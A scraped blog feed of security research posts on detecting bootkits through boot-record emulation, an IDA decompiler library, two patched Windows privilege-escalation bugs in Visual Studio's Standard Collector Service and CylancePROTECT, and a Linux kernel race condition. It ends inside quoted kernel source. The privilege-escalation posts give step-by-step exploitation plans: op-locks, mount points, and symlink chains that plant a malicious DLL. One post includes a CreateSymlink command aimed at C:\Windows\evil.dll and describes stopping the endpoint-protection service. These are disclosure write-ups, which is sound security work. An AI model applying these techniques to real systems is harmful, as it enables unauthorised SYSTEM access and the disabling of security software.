Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

BIOS Boots What? Finding Evil in Boot Code at Scale!

8 August 2018 at 14:45

The second issue is that reverse engineering all boot records is impractical. Given the job of determining if a single system is infected with a bootkit, a malware analyst could acquire a disk image and then reverse engineer the boot bytes to determine if anything malicious is present in the boot chain. However, this process takes time and even an army of skilled reverse engineers wouldn’t scale to the size of modern enterprise networks. To put this in context, the compromised enterprise network referenced in our ROCKBOOT blog post had approximately 10,000 hosts. Assuming a minimum of two boot records per host, a Master Boot Record (MBR) and a Volume Boot Record (VBR), that is an average of 20,000 boot records to analyze! An initial reaction is probably, “Why not just hash the boot records and only analyze the unique ones?” One would assume that corporate networks are mostly homogeneous, particularly with respect to boot code, yet this is not the case. Using the same network as an example, the 20,000 boot records reduced to only 6,000 unique records based on MD5 hash. Table 1 demonstrates this using data we’ve collected across our engagements for various enterprise sizes.

Enterprise Size (# hosts)

Avg # Unique Boot Records (md5)

100-1000

428

1000-10000

4,738

10000+

8,717

Table 1 – Unique boot records by MD5 hash

Now, the next thought might be, “Rather than hashing the entire record, why not implement a custom hashing technique where only subsections of the boot code are hashed, thus avoiding the dynamic data portions?” We tried this as well. For example, in the case of Master Boot Records, we used the bytes at the following two offsets to calculate a hash:

md5( offset[0:218] + offset[224:440] )

In one network this resulted in approximately 185,000 systems reducing to around 90 unique MBR hashes. However, this technique had drawbacks. Most notably, it required accounting for numerous special cases for applications such as Altiris, SafeBoot, and PGPGuard. This required small adjustments to the algorithm for each environment, which in turn required reverse engineering many records to find the appropriate offsets to hash.

Ultimately, we concluded that to solve the problem we needed a solution that provided the following:

  • A reliable collection of boot records from systems
  • A behavioral analysis of boot records, not just static analysis
  • The ability to analyze tens of thousands of boot records in a timely manner

The remainder of this post describes how we solved each of these challenges.

Collect the Bytes

Malicious drivers insert themselves into the disk driver stack so they can intercept disk I/O as it traverses the stack. They do this to hide their presence (the real bytes) on disk. To address this attack vector, we developed a custom kernel driver (henceforth, our “Raw Read” driver) capable of targeting various altitudes in the disk driver stack. Using the Raw Read driver, we identify the lowest level of the stack and read the bytes from that level (Figure 1).


Figure 1: Malicious driver inserts itself as a filter driver in the stack, raw read driver reads bytes from lowest level

This allows us to bypass the rest of the driver stack, as well as any user space hooks. (It is important to note, however, that if the lowest driver on the I/O stack has an inline code hook an attacker can still intercept the read requests.) Additionally, we can compare the bytes read from the lowest level of the driver stack to those read from user space. Introducing our first indicator of a compromised boot system: the bytes retrieved from user space don’t match those retrieved from the lowest level of the disk driver stack.

Analyze the Bytes

As previously mentioned, reverse engineering and static analysis are impractical when dealing with hundreds of thousands of boot records. Automated dynamic analysis is a more practical approach, specifically through emulating the execution of a boot record. In more technical terms, we are emulating the real mode instructions of a boot record.

The emulation engine that we chose is the Unicorn project. Unicorn is based on the QEMU emulator and supports 16-bit real mode emulation. As boot samples are collected from endpoint machines, they are sent to the emulation engine where high-level functionality is captured during emulation. This functionality includes events such as memory access, disk reads and writes, and other interrupts that execute during emulation.

The Execution Hash

Folding down (aka stacking) duplicate samples is critical to reduce the time needed on follow-up analysis by a human analyst. An interesting quality of the boot samples gathered at scale is that while samples are often functionally identical, the data they use (e.g. strings or offsets) is often very different. This makes it quite difficult to generate a hash to identify duplicates, as demonstrated in Table 1. So how can we solve this problem with emulation? Enter the “execution hash”. The idea is simple: during emulation, hash the mnemonic of every assembly instruction that executes (e.g., “md5(‘and’ + ‘mov’ + ‘shl’ + ‘or’)”). Figure 2 illustrates this concept of hashing the assembly instruction as it executes to ultimately arrive at the “execution hash”


Figure 2: Execution hash

Using this method, the 650,000 unique boot samples we’ve collected to date can be grouped into a little more than 300 unique execution hashes. This reduced data set makes it far more manageable to identify samples for follow-up analysis. Introducing our second indicator of a compromised boot system: an execution hash that is only found on a few systems in an enterprise!

Behavioral Analysis

Like all malware, suspicious activity executed by bootkits can vary widely. To avoid the pitfall of writing detection signatures for individual malware samples, we focused on identifying behavior that deviates from normal OS bootstrapping. To enable this analysis, the series of instructions that execute during emulation are fed into an analytic engine. Let's look in more detail at an example of malicious functionality exhibited by several bootkits that we discovered by analyzing the results of emulation.

Several malicious bootkits we discovered hooked the interrupt vector table (IVT) and the BIOS Data Area (BDA) to intercept system interrupts and data during the boot process. This can provide an attacker the ability to intercept disk reads and also alter the maximum memory reported by the system. By hooking these structures, bootkits can attempt to hide themselves on disk or even in memory.

These hooks can be identified by memory writes to the memory ranges reserved for the IVT and BDA during the boot process. The IVT structure is located at the memory range 0000:0000h to 0000:03FCh and the BDA is located at 0040:0000h. The malware can hook the interrupt 13h handler to inspect and modify disk writes that occur during the boot process. Additionally, bootkit malware has been observed modifying the memory size reported by the BIOS Data Area in order to potentially hide itself in memory.

This leads us to our final category of indicators of a compromised boot system: detection of suspicious behaviors such as IVT hooking, decoding and executing data from disk, suspicious screen output from the boot code, and modifying files or data on disk.

Do it at Scale

Dynamic analysis gives us a drastic improvement when determining the behavior of boot records, but it comes at a cost. Unlike static analysis or hashing, it is orders of magnitude slower. In our cloud analysis environment, the average time to emulate a single record is 4.83 seconds. Using the compromised enterprise network that contained ROCKBOOT as an example (approximately 20,000 boot records), it would take more than 26 hours to dynamically analyze (emulate) the records serially! In order to provide timely results to our analysts we needed to easily scale our analysis throughput relative to the amount of incoming data from our endpoint technologies. To further complicate the problem, boot record analysis tends to happen in batches, for example, when our endpoint technology is first deployed to a new enterprise.

With the advent of serverless cloud computing, we had the opportunity to create an emulation analysis service that scales to meet this demand – all while remaining cost effective. One of the advantages of serverless computing versus traditional cloud instances is that there are no compute costs during inactive periods; the only cost incurred is storage. Even when our cloud solution receives tens of thousands of records at the start of a new customer engagement, it can rapidly scale to meet demand and maintain near real-time detection of malicious bytes.

The cloud infrastructure we selected for our application is Amazon Web Services (AWS). Figure 3 provides an overview of the architecture.


Figure 3: Boot record analysis workflow

Our design currently utilizes:

  • API Gateway to provide a RESTful interface.
  • Lambda functions to do validation, emulation, analysis, as well as storage and retrieval of results.
  • DynamoDB to track progress of processed boot records through the system.
  • S3 to store boot records and emulation reports.

The architecture we created exposes a RESTful API that provides a handful of endpoints. At a high level the workflow is:

  1. Endpoint agents in customer networks automatically collect boot records using FireEye’s custom developed Raw Read kernel driver (see “Collect the bytes” described earlier) and return the records to FireEye’s Incident Response (IR) server.
  2. The IR server submits batches of boot records to the AWS-hosted REST interface, and polls the interface for batched results.
  3. The IR server provides a UI for analysts to view the aggregated results across the enterprise, as well as automated notifications when malicious boot records are found.

The REST API endpoints are exposed via AWS’s API Gateway, which then proxies the incoming requests to a “submission” Lambda. The submission Lambda validates the incoming data, stores the record (aka boot code) to S3, and then fans out the incoming requests to “analysis” Lambdas.

The analysis Lambda is where boot record emulation occurs. Because Lambdas are started on demand, this model allows for an incredibly high level of parallelization. AWS provides various settings to control the maximum concurrency for a Lambda function, as well as memory/CPU allocations and more. Once the analysis is complete, a report is generated for the boot record and the report is stored in S3. The reports include the results of emulation and other metadata extracted from the boot record (e.g., ASCII strings).

As described earlier, the IR server periodically polls the AWS REST endpoint until processing is complete, at which time the report is downloaded.

Find More Evil in Big Data

Our workflow for identifying malicious boot records is only effective when we know what malicious indicators to look for, or what execution hashes to blacklist. But what if a new malicious boot record (with a unique hash) evades our existing signatures?

For this problem, we leverage our in-house big data platform engine that we integrated into FireEye Helix following the acquisition of X15 Software. By loading the results of hundreds of thousands of emulations into the engine X15, our analysts can hunt through the results at scale and identify anomalous behaviors such as unique screen prints, unusual initial jump offsets, or patterns in disk reads or writes.

This analysis at scale helps us identify new and interesting samples to reverse engineer, and ultimately helps us identify new detection signatures that feed back into our analytic engine.

Conclusion

Within weeks of going live we detected previously unknown compromised systems in multiple customer environments. We’ve identified everything from ROCKBOOT and HDRoot! bootkits to the admittedly humorous JackTheRipper, a bootkit that spreads itself via floppy disk (no joke). Our system has collected and processed nearly 650,000 unique records to date and continues to find the evil needles (suspicious and malicious boot records) in very large haystacks.

In summary, by combining advanced endpoint boot record extraction with scalable serverless computing and an automated emulation engine, we can rapidly analyze thousands of records in search of evil. FireEye is now using this solution in both our Managed Defense and Incident Response offerings.

Acknowledgements

Dimiter Andonov, Jamin Becker, Fred House, and Seth Summersett contributed to this blog post.

FIDL: FLARE’s IDA Decompiler Library

25 November 2019 at 20:00

IDA Pro and the Hex Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the HexRays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback.  For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

  • The order nodes are visited in, is not always obvious based on the decompiler output
  • When visiting a node, we have no context about where we are in the AST
  • Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
  • The amount of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

  • Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
  • Abstracts away the minutiae of processing the AST
  • Provides helper implementations for commonly needed functionality when working with the decompiler
  • Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object FIDL will parse the AST for us and provides a high-level summary of a function using information extracted via the decompiler including APIs called, their parameters, and a summary of local variables and parameters for the function.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.


Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.


Figure 2: The default rendering of the AST of a function


Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts to leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the HexRays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. This new script is both easier to understand and does not rely on manually walking the AST.


Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress malware commonly manually revolves needed imports by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s exports looking for pre-computed values. As an analyst being able to quickly or automatically map these functions to their intended API makes it easier for us to identify which functions we should spend time analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.


Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.


Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which fixes this by reducing the amount of low-level details an analyst needs to understand in order to create a script leveraging the decompiler and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service

21 August 2018 at 20:50

If you aren't interested in the adventure behind this bug hunt, ATREDIS-2018-0004 is a good TL;DR and here is the Proof-of-Concept.

Process Monitor has become a favorite tool of mine for both research and development. During development of offensive security tools, I frequently use it to monitor how the tools interact with Windows and how they might be detected. Earlier this year I noticed some interesting behavior while I was debugging some code in Visual Studio and monitoring with Procmon. Normally I setup exclusion filters for Visual Studio processes to reduce the noise, but prior to setting up the filters I notice a SYSTEM process writing to a user owned directory:

StandardCollector.Service.exe writing to user Temp folder

StandardCollector.Service.exe writing to user Temp folder

When a privileged service writes to a user owned resource, it opens up the possibility of symlink attack vector, as previously shown in the Cylance privilege escalation bug I found. With the goal of identifying how I can directly influence the service's behavior, I began my research into the Standard Collector Service by reviewing the service's loaded libraries:

Visual Studio DLLs loaded by StandardCollector.Service.exe

Visual Studio DLLs loaded by StandardCollector.Service.exe

The library paths indicated the Standard Collector Service was a part of Visual Studio's diagnostics tools. After reviewing the libraries and executables in the related folders, I identified several of the binaries were written in .NET, including a standalone CLI tool named VSDiagnostics.exe, here is the console output:

Help output from VSDiagnostics CLI tool

Help output from VSDiagnostics CLI tool

Loading VSDiagnostics into dnSpy revealed a lot about the tool as well as how it interacts with the Standard Collector Service. First, an instance of IStandardCollectorService is acquired and a session configuration is used to create an ICollectionSession:

Initial steps for configuring diagnostics collection session

Initial steps for configuring diagnostics collection session

Next, agents are added to the ICollectionSession with a CLSID and DLL name, which also stood out as an interesting user controlled behavior. It also made me remember previous research that exploited this exact behavior DLL loading behavior. At this point, it looked like the Visual Studio Standard Collector Service was very similar or the same as the Diagnostics Hub Standard Collector Service included with Windows 10. I began investigating this assumption by using OleViewDotNet to query the services for their supported interfaces:

Windows Diagnostics Hub Standard Collector Service in OleViewDotNet

Windows Diagnostics Hub Standard Collector Service in OleViewDotNet

Viewing the proxy definition of the IStandardCollectorService revealed other familiar interfaces, specifically the ICollectionSession interface seen in the VSDiagnostics source:

ICollectionSession interface definition in OleViewDotNet

ICollectionSession interface definition in OleViewDotNet

Taking note of the Interface ID ("IID"), I returned to the .NET interop library to compare the IIDs and found that they were different:

Visual Studio ICollectionSession definition with different IID

Visual Studio ICollectionSession definition with different IID

Looking deeper into the .NET code, I found that these Visual Studio specific interfaces are loaded through the proxy DLLs:

VSDiagnostics.exe function to Load Proxy Stub DLLs

VSDiagnostics.exe function to Load Proxy Stub DLLs

A quick review of the ManualRegisterInterfaces function in the DiagnosticsHub.StandardCollector.Proxy.dll showed a simple loop that iterates over an array of IIDs. Included in the array of IIDs is one belonging to the ICollectionSession:

ManualRegisterInterfaces function of proxy stub DLL

ManualRegisterInterfaces function of proxy stub DLL

Visual Studio ICollectionSession IID in array of IIDs to register

Visual Studio ICollectionSession IID in array of IIDs to register

After I had a better understanding of the Visual Studio Collector service, I wanted to see if I could reuse the same .NET interop code to control the Windows Collector service. In order to interact with the correct service, I had to replace the Visual Studio CLSIDs and IIDs with the correct Windows Collector service CLSIDs and IIDs. Next, I used the modified code to build a client that simply created and started a diagnostics session with the collector service:

Code snippet of client used to interact with Collector service

Code snippet of client used to interact with Collector service

Starting Procmon and running the client resulted in several files and folders being created in the specified C:\Temp scratch directory. Analyzing these events in Procmon showed that the initial directory creation was performed with client impersonation:

Session folder created in scratch directory with impersonation

Session folder created in scratch directory with impersonation

Although the initial directory was created while impersonating the client, the subsequent files and folders were created without impersonation:

Folder created without impersonation

Folder created without impersonation

After taking a deeper look at the other file operations, there were several that stood out. The image below is an annotated break down of the various file operations performed by the Standard Collector Service:

Various file operations performed by Standard Collector Service

Various file operations performed by Standard Collector Service

The most interesting behavior is the file copy operation that occurs during the diagnostics report creation. The image below shows the corresponding call stack and events of this behavior:

CopyFile operation performed by the Standard Collector Service

CopyFile operation performed by the Standard Collector Service

Now that I've identified user influenced behaviors, I construct a possible arbitrary file creation exploit plan:

  1. Obtain op-lock on merged ETL file ({GUID}.1.m.etl) as soon as service calls CloseFile
  2. Find and convert report sub-folder as mount point to C:\Windows\System32
  3. Replace contents of {GUID}.1.m.etl with malicious DLL
  4. Release op-lock to allow ETL file to be copied through the mount point
  5. Start new collection session with copied ETL as agent DLL, triggering elevated code execution

To write the exploit, I extended the client from earlier by leveraging James Forshaw's NtApiDotNet C# library to programmatically create the op-lock and mount point. The images below shows code snippet used to acquire the op-lock and the corresponding Procmon output illustrating the loop and op-lock acquisition:

Code snippet used to acquire op-lock on .etl file

Code snippet used to acquire op-lock on .etl file

Winning race condition with op-lock

Winning race condition with op-lock

Acquiring an op-lock on the file essentially stops the CopyFile race, allows the contents to be overwritten, and provides control of when the CopyFile occurs. Next, the exploit looks for the Report folder and scans it for the randomly named sub directory that needs to be converted to a mount point. Once the mount point is successfully created, the contents of the .etl are replaced with a malicious DLL. Finally, the .etl file is closed and the op-lock is released, allowing the CopyFile operation to continue. The code snippet and Procmon output for this step is shown in the images below:

Code snippet that creates mount point, overwrites .etl file, and releases op-lock

Code snippet that creates mount point, overwrites .etl file, and releases op-lock

Procmon output for arbitrary file write through mount point folder

Procmon output for arbitrary file write through mount point folder

There are several techniques for escalating privileges through an arbitrary file write, but for this exploit, I chose to use the Collector service's agent DLL loading capability to keep it isolated to a single service. You'll notice in the image above, I did not use the mount point + symlink trick to rename the file to a .dll because DLLs can be loaded with any extension. For the purpose of this exploit the DLL simply needed to be in the System32 folder for the Collector service to load it. The image below demonstrates successful execution of the exploit and the corresponding Procmon output:

SystemCollector.exe exploit PoC output

SystemCollector.exe exploit PoC output

Procmon output of successful exploitation

Procmon output of successful exploitation

I know that the above screenshots show the exploit was run as the user "Admin", so here is a GIF showing it being ran as "bob", a low-privileged user account:

Running exploit as low-privileged user

Running exploit as low-privileged user

Feel free to try out the SystemCollector PoC yourself. Turning the PoC into a portable exploit for offensive security engagements is a task I'll leave to the reader. The NtApiDotNet library is also a PowerShell module, which should make things a bit easier.

After this bug was patched as part of the August 2018 Patch Tuesday, I began reversing the patch, which was relatively simple. As expected, the patch simply added CoImpersonateClient calls prior to the previously vulnerable file operations, specifically the CommitPackagingResult function in DiagnosticsHub.StandardCollector.Runtime.dll:

Report folder being created with impersation

Report folder being created with impersation

CoImpersonateClient added to CommitPackagingResult in DiagnosticsHub.StandardCollector.Runtime.dll

CoImpersonateClient added to CommitPackagingResult in DiagnosticsHub.StandardCollector.Runtime.dll

As previously mentioned in the Cylance privilege escalation write-up, protecting against symlink attacks may seem easy, but is often times overlooked. Any time a privileged service is performing file operations on behalf of a user, proper impersonation is needed in order to prevent these types of attacks.

Upon finding this vulnerability, MSRC was contacted with the vulnerability details and PoC. MSRC quickly triaged and validated the finding and provided regular updates throughout the remediation process. The full disclosure timeline can be found in the Atredis advisory link below.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0004

The CVE assigned to this vulnerability is: CVE-2018-0952

CVE-2018-0952: Privilege Escalation Vulnerability in Windows Standard Collector Service

Escalating Privileges with CylancePROTECT

1 May 2018 at 19:23

If you regularly perform penetration tests, red team exercises, or endpoint assessments, chances are you've probably encountered CylancePROTECT at some point. Depending on the CylancePROTECT policy configuration, your standard tools and techniques may not have worked as expected. I've ran into situations where the administrators of CylancePROTECT set the policy to be too relaxed and establishing a presence on the target system was trivial. With that said, I've also encountered targets where the policy was very strict and gaining a stable, reliable shell was not an easy task.

After a few frustrating CylancePROTECT encounters, I decided to install it locally and learn more about how it works to try and make my next encounter less frustrating. The majority of CylancePROTECT is written in .NET, so I started by firing up dnSpy, loaded the assemblies, and started looking around. I spent several nights and weekends casually looking through the codebase (which is quite massive) and found myself spending most of my time analyzing how the CylanceUI process communicated with the CylanceSvc process. My hope was that I would find a secret command I could use to stop the service as a user, but no such command exists (for users). However, I did find a privilege escalation vulnerability that could be triggered as a user via the inter-process communication ("IPC") channels.

Several commands can be sent to the CylanceSvc from the CylanceUI process via the tray menu, some of which are enabled by starting the UI with the advanced flag: CylanceUI.exe /advanced

CylanceUI Advanced Menu

CylanceUI Advanced Menu

Prior to starting a deeper investigation of the different menu options, I used Process Monitor to get high level view of how CylancePROTECT interacted with Windows when I clicked these menu options. My favorite option ended up being the logging verbosity, not only because it gave me an even deeper insight into what CylancePROTECT was doing, but also because it plays a major role in this privilege escalation vulnerability. The 'Check for Updates' option also caught my eye in procmon because it caused the CyUpdate process to spawn as SYSTEM.

CyUpdate Spawning as SYSTEM

CyUpdate Spawning as SYSTEM

The procmon output I witnessed at this point told me quite a bit and was what made me begin my hunt for a possible privilege escalation vulnerability. The three main indicators were:

  1. As a user, I could communicate with the CylanceSvc service and influences its behavior
  2. As a user, I could trigger the CyUpdate process to spawn with SYSTEM privileges
  3. As a user, I could cause the CylanceUI process to write to the same file/folder as the SYSTEM process
CylanceUI and CylanceSvc writing to log

CylanceUI and CylanceSvc writing to log

CyUpdate writing to log

CyUpdate writing to log

The third indicator is the most important. It’s not uncommon for a user process and system process to share the same resource, but it is uncommon for the user process to have full read/write permissions to that resource. I confirmed the permissions on the log folder and files with icacls:

Log folder and File Modify Permissions

Log folder and File Modify Permissions

Having modify permissions on a folder will allow for it to be setup as a mount point to redirect read/write operations to another location. I confirmed this by using James Forshaw's symboliclink-testing-tools to create a mount point, as well as try other symbolic link vectors. Before creating the mount point, I made sure to set CylancePROTECT’s log level to 'Error' to prevent additional logs from being created after I emptied the log folder.

Log folder mount point created

Log folder mount point created

After creating the mount point, I increased the log verbosity and confirmed the log file was created in the mount point target folder, C:\Windows.

CylanceSvc writing log to C:\Windows\

CylanceSvc writing log to C:\Windows\

CyUpdate change log file permissions

CyUpdate change log file permissions

Log file modify permissions

Log file modify permissions

Writing a log file to an arbitrary location is neat but doesn't demonstrate much impact or add value to an attack vector. To gain SYSTEM privileges with this vector, I needed to be able to control the filename that was written, as well as the contents of the file. Neither of these tasks can be accomplished by interacting with CylancePROTECT via the IPC channels. However, I was able to use one of Forshaw's clever symbolic link tricks to control the name of the file. This is done by using two symbolic links that are setup like this:

  1. C:\Program Files\Cylance\Desktop\log mount point folder points to the \RPC Control\ object directory.
  2. \RPC Control\2018-03-20.log symlink points to \??\C:\Windows\evil.dll

One of James' symbolic link testing tools will automatically create this symlink chain by simply specifying the original file and target destination, in this case the command looked like this, CreateSymlink.exe "C:\Program Files\Cylance\Desktop\log\2018-03-20.log" C:\Windows\evil.dll, and the result was:

Creating symlink chain to control filename

Creating symlink chain to control filename

File with arbitrary name created in C:\Windows

File with arbitrary name created in C:\Windows

At this point I've written a file to an arbitrary location with an arbitrary name and since the CyUpdate.exe process grants Users modify permissions on the "log file", I could overwrite the log contents with the contents of a DLL.

Contents of C:\Windows\evil.dll

Contents of C:\Windows\evil.dll

Verifying overwrite permissions

Verifying overwrite permissions

From here all I needed to get a SYSTEM shell was a DLL hijack in a SYSTEM service. I decided to target CylancePROTECT for this because I knew I could reliably spawn the CyUpdate process as a user. Leveraging Procmon again, I set my filters to:

  1. Path contains .dll
  2. Result contains NOT
  3. Process is CyUpdate.exe

The resulting output in procmon looked like this:

libc.dll hijack identified in procmon

libc.dll hijack identified in procmon

Now all I had to do was setup the chain again, but this time point the symlink to C:\Program Files\Cylance\Desktop\libc.dll (any of the highlighted locations would have worked). This symlink gave me a modifiable DLL that I could force CylancePROTECT to load and execute, resulting in a SYSTEM shell:

Gaining SYSTEM shell and stopping CylanceSvc

Gaining SYSTEM shell and stopping CylanceSvc

Elevating our privileges from a user to SYSTEM is great, but more importantly, we meet the conditions required to communicate with the CylancePROTECT kernel driver CYDETECT. This elevated privilege allows us to send the ENABLE_STOP IOCTL code to the kernel driver and gracefully stop the service. In the screenshot above, you’ll notice the CylanceSvc is stopped as a result of loading the DLL.

Privilege escalation vulnerabilities via symbolic links are quite common. James Forshaw has found many of them in Windows and other Microsoft products. The initial identification of these types of bugs can be performed without ever opening IDA or doing any sort of static analysis, as I’ve demonstrated above. With that said, it is still a good idea to find the offending code and determine if it’s within a library that affects multiple services or an isolated issue.

Preventing symbolic link attacks may not be as easy as you would think. From a developer’s perspective, these types of vulnerabilities don’t stand out like a SQLi, XSS, or RCE bug since they’re typically a hard to spot permissions issue. When privileged services need to share file system resources with low-privileged users, it is very important that the user permissions are minimal.

Upon finding this vulnerability, Cylance was contacted, and a collaborative effort was made through Bugcrowd to remediate the finding. Cylance responded to the submission quickly and validated the finding within a few days. The fix was deployed 40 days after the submission and was included in the 1470 release of CylancePROTECT.

If you have any questions or comments, feel free to reach out to me on Twitter: @ryHanson

Atredis Partners has assigned this vulnerability the advisory ID: ATREDIS-2018-0003.

The CVE assigned to this vulnerability is: CVE-2018-10722

Escalating Privileges with CylancePROTECT

Racing against the clock -- hitting a tiny kernel race window

By: Ryan
24 March 2022 at 20:51

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

While __fget_files() is making an incorrect assumption about the state of the struct file while it is trying to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)

{

        struct file *file;

        rcu_read_lock();

loop:

        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)

                 */

                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;

        }

        rcu_read_unlock();

        return file;

}

